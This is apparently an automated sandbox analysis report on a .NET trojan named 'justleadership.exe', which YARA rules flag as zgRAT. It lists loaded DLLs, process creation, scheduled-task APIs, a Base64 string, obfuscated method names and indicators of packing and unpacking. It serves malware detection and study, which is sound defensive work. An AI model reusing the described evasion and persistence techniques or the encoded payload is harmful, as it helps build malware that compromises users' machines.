                    Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2123072673.0000000003644000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2119536181.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2157878459.0000000006870000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGtzoki.dll" vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs justleadership.exe
                    Source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs justleadership.exe
                    Source: justleadership.exe, 00000004.00000002.2147404072.0000000000456000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBalsas.exe" vs justleadership.exe
                    Source: justleadership.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: justleadership.exe, -.csCryptographic APIs: 'CreateDecryptor'
                    Source: justleadership.exe, Mfitkt.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: justleadership.exe, -.csBase64 encoded string: 'ykCFYv5qt2uTcPdi+k2fefUp2EqFc/Zl9UDNUf5z3FeCZOJG6kqTe/lr4AKRc+9Y30yaetVm9FzNeetY0FeTZ+5m9VCCb6Bg/E2pWv5p/k2eLdxi7W2PZv5B61abXvpp/VWTLfxi7Wa4d/ZionCYcv5/1l/NRP5m/WqCZPJp/gK3cv88/lyCScto6lCCf/Rpol6TYsRE7EuEc/Vz3Vabd/JpomqTYt9m7VjNJKg/qA3NV+h0/FSUeuJU/EuAc+k8ylCbZvdi2EqFc/Zl9UCzbutr9kuTZKBl+FuTeu1qokqbefBi7VyFYg=='
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/1@0/1
                    Source: C:\Users\user\Desktop\justleadership.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\justleadership.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
                    Source: justleadership.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: justleadership.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\justleadership.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: justleadership.exeReversingLabs: Detection: 60%
                    Source: unknownProcess created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
                    Source: C:\Users\user\Desktop\justleadership.exeProcess created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
                    Source: C:\Users\user\Desktop\justleadership.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\justleadership.exeProcess created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: justleadership.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: justleadership.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: justleadership.exeStatic file information: File size 6369280 > 1048576
                    Source: justleadership.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x612600
                    Source: justleadership.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs.Net Code: Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777259)),Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777263))})
                    .NET source code contains potential unpacker
                    Source: justleadership.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: justleadership.exe, Eutboveuhzm.cs.Net Code: _E003 System.AppDomain.Load(byte[])
                    Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.justleadership.exe.6ad0000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2160604823.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_069B2E5F pushfd ; retf 0_2_069B2E60
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A44F28 push eax; ret 0_2_06A44F29
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A4346B push eax; iretd 0_2_06A4346D
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A94F33 push es; retf 0_2_06A94F7C
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06A98F1A push es; retf 0_2_06A98F20
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B66F11 push es; ret 0_2_06B66F20
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B835E2 push ecx; retf 0_2_06B835E3
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B85AA2 push es; retf 0_2_06B85B38
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B85A79 push es; retf 0_2_06B85A9C
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B85B4A push es; ret 0_2_06B85B68
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B8B8A0 push es; ret 0_2_06B8B950
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06B8599E push es; retf 0_2_06B859A4
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06C03E29 pushfd ; ret 0_2_06C03E30
                    Source: C:\Users\user\Desktop\justleadership.exeCode function: 0_2_06E768FE push esi; retf 0_2_06E76907
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, url4dHBYRv4DinV2mxi.csHigh entropy of concatenated method names: 'FToBudHHBO', 'QS0BhaWAyw', 'daNBfhJypC', 'AP4BThMdbg', 'Fl5Br9ra78', 'BOFBZ8fpP8', 's2KBXNYTTJ', 'CnpBjqolcY', 'o7VBDsKd72', 'NUaB81AYS2'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'U0ennNPk4THDRcVqk3W'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RmXGCEYe833fceXaGLY.csHigh entropy of concatenated method names: 'LcpYCOib37', 'eHCqTSyrsutwaDq6evY', 'Jd1D2byZL5My41Ql3u7', 'dMWA4SyXRnJr1mGBRQD', 'nVssCVyjhodYc7btY9Q', 'zePYJByD6nXCoGG2Oiq', 'ITG0bry81yZAwJ1HlF6', 'Am2H1lyUP0Fcy4FC6R1', 'eUfI7CyE3PMMRTj1kMf', 'WrsZWVyTgjy8woVc5rR'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mCTrEn2z2fhB72SJbcF.csHigh entropy of concatenated method names: 'z2FZtDbGNR', 'uLOZ5JpE7H', 'toSZlp2NC7', 'raVZx4x8Wx', 'sMCZ0s3h9R', 'Gx2ZQrKMAl', 'lHvZLWxpSU', 'N0ehdm8jf6', 'DRsZgU5Y2b', 'MJUZKwyQ7m'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RjIvudFr6Fj3bWrFWjZ.csHigh entropy of concatenated method names: 'urgFXhYqML', 'WToFjNUokq', 'usgcvtywqGTelLrfZN1', 'VoWZ0Cy4kcmf3vLRsYH', 'nH791RyOEmGc1yMjjWR', 'C0OEVnykcGlR3ldyOM6', 'rMGq2Ay1b4wr8T80lou', 'JKYFTeyeSIy3sMD2NGe', 'V6aQBTyNJn0EYd44TBb', 'vLlB9oyC0eHvOSgQ6bZ'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, K5lXLQYbpPLs7Cy7sZ5.csHigh entropy of concatenated method names: 'HY5YMJJ5er', 'IOtyr1KM3AsTRqBMKqV', 'jvmqn9K6dhsHlDYEegF', 'JaFRCEKmdU3qMnX49wG', 'PR0MI5K35eP4eq9stw6', 'M7pGnIKWxvKtmEQ7nwU', 'tr2TNMKpdiApgcdAWQC', 'TgLQs1KbJXCmh6ibZ47', 'cr88jbKo6bRwX0eS8jJ'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, FQqLQOYvo9K7kMZ7dEH.csHigh entropy of concatenated method names: 'EwaYkGYqMt', 'vlVOrcKHPaC4PJumIBk', 'xNwpy3KzDeiLgZmfv8u', 'ofusQoyGbNs8rQ2IHvc', 'AhTkBJyArJQj8vRVyba', 'irtVpIyVPHc1R9sogIv', 'xhCpfgyqRo7vrT2VKOL', 'HnrHvPy7gnCn1agivpt', 'YN301ayijlWW2axOSqi', 'WUsYOcyBJSVcLCMaiDH'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, UVyr1uUeGgqQycKKbb.csHigh entropy of concatenated method names: 'sE2t85lsK', 'Jhr5Cby6x', 'Jf9x9lXnW', 'dJxluROf3', 'GrwIFmxidWw82L5HP0i', 'jPBlh7xByJN60mY39PW', 'rYyDIaxIBX2pOsLutlk', 'aJ8AEdxcDTl8RDTHlrE', 'qlo7TgxYrjrWUddf06A', 'lR8wBLxq8ZSfrKWsMGN'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, oF4cRViQA2MnNFvgeQW.csHigh entropy of concatenated method names: 'MwSig7cek5', 'tMbiEd0e2i69S1WbXMr', 'EWA7oL0NhByPdOfVTR3', 'VZWYnx0CiCsFJCsEql8', 'ESk32o0RWKp00dYMOli', 'RwkCBH0HYaSXDBxu9F0', 'LMSwnL042CNqRhIYMgo', 'HpDtFJ01bp6mHlcP4o8'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, JBMOeuYRYHJniwiOAbg.csHigh entropy of concatenated method names: 'e4dYzIvRyZ', 'QbjFAHVcaE', 'msoFGu3HyF', 'inYyl7ylB7VMFJwCfa8', 'CNoSS9ytQG4qeZKyr7T', 'Mko42Vy5mQWKVuYBy5e', 'Ev3ZqsyxT1kfBVJIQQM', 'cIDs0Ty0cHnQg6jROFc'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, P2NQ5phXim7fiptqdX.csHigh entropy of concatenated method names: 'YDlESIE8d', 'OYcTnsfwA', 'rjoZ6gSog', 'AF3X3GrOa', 'euUf8BYNF', 'jgmOPrleo1d08c4C0IO', 'fVJteFlNUqAK0951DNu', 'cccYYylCZVsB5gku9pT', 'LJVD59lR8XYAblLfDSS', 'beGnkQlHSnp1dpQ4hhU'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, uN1Y14iMJqSiYBGmnt7.csHigh entropy of concatenated method names: 'Kaoim8YcYD', 'ShMi3fdELB', 'JbTiWt7X5y', 'j2IGiXQmrsJfY4cvf1V', 'fLimbjQ34wRQkpZPpN8', 'KJMqIrQMuCVkUuA12WI', 'FOhA1rQ6NBi2YZUQnhM', 'rv35qNQWNUPmA5dfAuu', 'R8UU6LQpYyqdo3eqhSa', 'syRiq3QsZ908BfSkFou'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.csHigh entropy of concatenated method names: 'cngabyayfPMq8GFSA3o', 'ARvuNfaPmsvuxo4NpAM', 'afi22EGM6x', 'R8L9pLaoGZkiwrw0gg6', 'RE9ubNaMrp9Z50pKV1C', 'SCt9Ida68Dc2B8FahQx', 'QM2A04amWLbL9KlRE1E', 'oF9xdla3PxJdiJifS4J', 'xHFrLkaWSpX8AxrUtdK', 'nBHO2yapcJhhYYq3iKH'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, tutioMi5rSsHCFM8roS.csHigh entropy of concatenated method names: 'Oo9ixsYquO', 'ayqi01DrS9', 'X9V57y0nSpKGVqtbXHl', 'XDffTQ0s98pUBf8HFp2', 'MQLCdm0J6T1o48ZaEPD', 'ckUFt30vLILGrmb2AVR', 'Iv1WV70OLULRiyTtyiP', 'aKRJ6x0kfnkrv96dveM'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, U7h5sdBy6DKgXavfsmE.csHigh entropy of concatenated method names: 'm1vB6jQraN', 'r04CLUL1xk81xh7ZbF7', 'IigsFiLee5y8bwaIUof', 'FfRGBPLNO1xqdVbUVJZ', 'lwEtO8LwNmfOW9IqiFi', 'YrNFZtL423s3Qiis2Kx', 'M9lqE1LskC8Llmcret3', 'bcqAdyLJQJdtKjnUcCW'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, yYDlN32bGE2YDaEeKnk.csHigh entropy of concatenated method names: 'AID2O5gP53', 'cxD2kM9Z9B', 'e5N2wlCIlL', 'lDY241hWvv', 's8M21bkLnZ', 'f8X2e2GvR6', 'HiM2NWNWIF', 'Goq2C1HM14', 'mdj2R5mrrE', 'sWG2HElo04'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, cqVKKxYyN45AjLfeK2Z.csHigh entropy of concatenated method names: 'XSGYaFNMag', 'dTwY9vllC5', 'Yix4q7Ku0Lw3M6ugGIU', 'PEOxi3K2x5Pl0OKo4xp', 'CjXZkaKh0LfQWbLM1Mc', 'WBCUqkKSU4LIb1fiYYW', 'ugYT47KfuJPdL6pSyUZ', 'cRL9IWKERYAFKmZin22', 'sidBQ8KTL0SRhK9wSFa', 'yXrNNEKrhwt9MbUZuL1'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, jIlhxliK9NnMpvvFoHZ.csHigh entropy of concatenated method names: 'MK8iPcjDUS', 'oqqia2CUAd', 'Ikxi9oZC4D', 'qloibwPl9S', 'UyEio8443P', 'HrRHG8QVtjvjsT35riG', 'X73DGFQqXZjKw7srj9T', 'iFF6YNQ7eJovTeeTjxH', 'HOn2P9QiwMrPFgM6Lr6', 'FPS1nIQB6oSEn8v1BTG'
                    Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dvkauUYtyHA3eecX0hi.csHigh entropy of concatenated method names: 'NmHYlyoXRi', 'AFOFbDgwTWKoMioonYX', 'Rwel1ag4BfHyb5BbS7N', 'g9gxCRg1PPaw7YKLFOS', 'wBr6ypger1yRjrMB0sC', 'SpeUqKgN7KQj1sxNJ34', 'cJTjJFgCsYESYTdQdgD', 'FvPfP0gR5Ma5U5bPTfM', 'fPgaHqgO8xysRmtVUwn', 'b3IZcAgk5B19TpMvJJs'
